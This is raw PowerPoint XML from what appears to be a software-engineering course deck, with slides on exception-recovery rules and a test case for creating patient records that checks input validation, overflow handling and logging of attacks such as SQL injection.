          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recovery is preferable and may be required for a mission critical function.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exceptions are preferably recovered at lower action-oriented levels, where the specific condition is known.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A means of manual intervention may be required for mission critical code.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proper failure response is best decided during Requirements stage.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECE61F22-60A9-CEE0-0D73-DEA129D2E282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lower-level Programming Rules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3416617786"/>
      </p:ext>
    </p:extLst>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98AC-78B1-49A9-A676-A7971ED0AEB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="4406900"/>
            <a:ext cx="7772400" cy="553998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0C824A0-9442-4568-9470-104FD2B30F8A}"/>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25591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6CCB170-74AD-6659-1D82-62A2FF6FF6BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6A67A9A-7305-DFFC-7013-1909A77067D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half"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A test plan holds a number of test cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ach test case would test potentially for a particular set of features or tests. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Online Image Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A92587-DABC-FBE5-5AFB-63BDB910FEDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph type="clipArt" sz="half" idx="2"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1967916381"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4648200" y="1981200"/>
          <a:ext cx="4038600" cy="388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1619661"/>
      </p:ext>
    </p:extLst>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1C508B2-E8AC-C01F-B345-62C5A6EFEB9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="520700" y="1600200"/>
          <a:ext cx="8154988" cy="4394589"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" lastRow="1" lastCol="1" bandRow="1" bandCol="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8154988">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="525737822"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="355989">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Test Case: Create Patient Information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6553293"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="355989">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Test Case ID: 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3863172"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3326622">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Test Purpose:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ensure a valid new client can be entered into the system, and the appropriate tabs are created.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ensure a duplicate entry is not created for an existing patient.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ensure invalid data is detected, including wrong data types, overflow text, overflow math numbers, blank required fields, and inappropriate data.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ensure logs are created for attacks, including overflow, business rule violations and SQL errors or injection.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ensure encrypted transaction log is created documenting the transaction, and the author and time of the transaction.</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25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2134475075"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="355989">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Preconditions:  The tester is logged in at the main menu.</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25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3814338855"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD99A8D3-287E-AD2C-29B3-9B0D231F5525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developing a Test Case</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="861389548"/>
      </p:ext>
    </p:extLst>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B60E22E-7B7D-0508-E1CB-5AA24734E683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="520700" y="1519238"/>
          <a:ext cx="8154988" cy="5030978"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" lastRow="1" lastCol="1" bandRow="1" bandCol="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8154988">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4000545009"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4879975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Flow of Events:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                        <a:tabLst>
                          <a:tab pos="457200" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The tester selects “Manage Patient” or as an extension to Make Appointment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                        <a:tabLst>
                          <a:tab pos="457200" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The tester: enters last and first name for an existing patient and presses ‘Create’.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                        <a:tabLst>
                          <a:tab pos="457200" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>While the system finds a matching record</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                        <a:tabLst>
                          <a:tab pos="914400" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The system should display an error message: “Match Exists”, and requests the tester revise the information.  </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                        <a:tabLst>
                          <a:tab pos="914400" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The tester changes the name to a new patient name.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The system should display multiple tabs, including Patient Information (Form 6.2, Patient Medical History (Form 6.3), and Patient Medical Information (Form 6.4).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The system should rename the ‘Create’ button into the ‘Save’ button.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRP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tester enters inappropriate data types according to business rules for each field of the new Patient data and presses ‘Save’. </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system should recognize the invalid information and gives error messages.</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tester enters too much information for text strings or overflow data for arithmetic fields for each field of the new Patient and presses ‘Save’. </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system should recognize the overflow, provide error messages, remain on the same page, and log the error(s).</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tester leaves required fields empty for the new Patient and presses ‘Save’. </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="52698" marR="52698" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1240873934"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A442F62-B8F0-418B-2481-889631519243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test Case: Flow of Events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="596607817"/>
      </p:ext>
    </p:extLst>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B60E22E-7B7D-0508-E1CB-5AA24734E683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="520700" y="1519238"/>
          <a:ext cx="8154988" cy="4421187"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" lastRow="1" lastCol="1" bandRow="1" bandCol="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8154988">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4000545009"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4421187">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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system should recognize the lacking information and gives error messages.</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tester enters inappropriate information (violating business rules) for controlled fields of the new Patient and presses ‘Save’ (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>e.g</a:t>
